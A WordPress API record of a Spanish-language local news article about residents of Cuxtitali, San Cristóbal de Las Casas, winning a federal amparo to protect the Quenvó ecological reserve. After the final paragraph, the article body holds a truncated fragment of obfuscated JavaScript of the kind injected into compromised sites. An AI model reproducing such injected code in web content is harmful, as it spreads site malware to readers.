{"id":15845,"date":"2024-05-29T03:06:28","date_gmt":"2024-05-29T03:06:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15845"},"modified":"2024-05-29T03:06:29","modified_gmt":"2024-05-29T03:06:29","slug":"obtienen-amparo-federal-para-proteger-la-reserva-quenvo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15845","title":{"rendered":"Obtienen amparo federal para proteger la Reserva Quenv\u00f3"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240528-WA0017-1024x576.jpg\" alt=\"\" class=\"wp-image-15846\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240528-WA0017-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240528-WA0017-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240528-WA0017-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240528-WA0017.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>28 de mayo del 2924.San Crist\u00f3bal de Las Casas.- En conferencia de prensa, integrantes de la mesa directiva del Sistema de Agua Chupactic anunciaron la obtenci\u00f3n de un amparo federal que les autoriza la custodia de las 22.13 hect\u00e1reas que conforman la Reserva Ecol\u00f3gica Quenv\u00f3 Cuxtitali.<\/p>\n\n\n\n<p>La hist\u00f3rica resoluci\u00f3n, emitida el 21 de mayo de 2024, marca un precedente significativo en la lucha por la defensa del medio ambiente en Chiapas. La mesa directiva inform\u00f3 a los socios y usuarios del Sistema de Agua Chupactic, as\u00ed como a toda la ciudadan\u00eda sancristobalense, que ganaron legalmente el amparo federal tras un arduo proceso legal iniciado el 19 de junio de 2019.<\/p>\n\n\n\n<p>\u201cEn esa fecha, la Honorable Asamblea del Barrio de Cuxtitali determin\u00f3 llevar a cabo un Juicio de Amparo colectivo en materia ambiental en el Juzgado de Distrito de Amparo y Juicios Federales del Estado de Chiapas, con la representaci\u00f3n legal de la mesa directiva del Sistema de Agua Chupactic\u201d, se\u00f1alaron mientras le\u00edan un comunicado.<\/p>\n\n\n\n<p>&#8220;Con agradecimiento y gozo les informamos que despu\u00e9s del proceso que comenzamos el 19 de junio de 2019, donde la Honorable Asamblea del Barrio de Cuxtitali determin\u00f3 llevar a cabo un Juicio de Amparo colectivo en materia ambiental en el Juzgado de Distrito de Amparo y Juicios Federales del Estado de Chiapas, ganamos dicho amparo. Es una fecha hist\u00f3rica para nuestro barrio antiguo de Cuxtitali&#8221;, declar\u00f3 la mesa directiva durante la conferencia.<\/p>\n\n\n\n<p>Este amparo representa una victoria sin precedentes en Chiapas, siendo el primer juicio en materia ambiental que un colectivo gana contra trece instituciones de gobierno municipal y estatal. La lucha no fue f\u00e1cil, y los hombres y mujeres que iniciaron este proceso legal sufrieron y padecieron las dificultades inherentes a la defensa de la vida, del territorio, de la Madre Tierra y del derecho humano a vivir en un ambiente sano y saludable. &#8220;Que bien ha valido la pena para que sirva de precedente legal&#8221;, subrayan.<\/p>\n\n\n\n<p>Ciudadanos y acad\u00e9micos presentes en la conferencia de prensa reconocieron la resistencia y persistencia de los integrantes de la mesa directiva, quienes, acompa\u00f1ados, apoyados y asesorados por abogados comprometidos, apostaron y confiaron en este gran logro en defensa y protecci\u00f3n de la Madre Tierra.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 28 de mayo del 2924.San Crist\u00f3bal de Las Casas.- En conferencia de prensa, integrantes de la mesa directiva del Sistema de Agua Chupactic anunciaron la obtenci\u00f3n de un amparo federal que les autoriza la custodia de las 22.13 hect\u00e1reas que conforman la Reserva Ecol\u00f3gica Quenv\u00f3 Cuxtitali. La hist\u00f3rica resoluci\u00f3n, emitida el 21 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15846,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15845","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15845","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15845"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15845\/revisions"}],"predecessor-version":[{"id":15847,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15845\/revisions\/15847"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15846"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15845"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15845"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15845"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}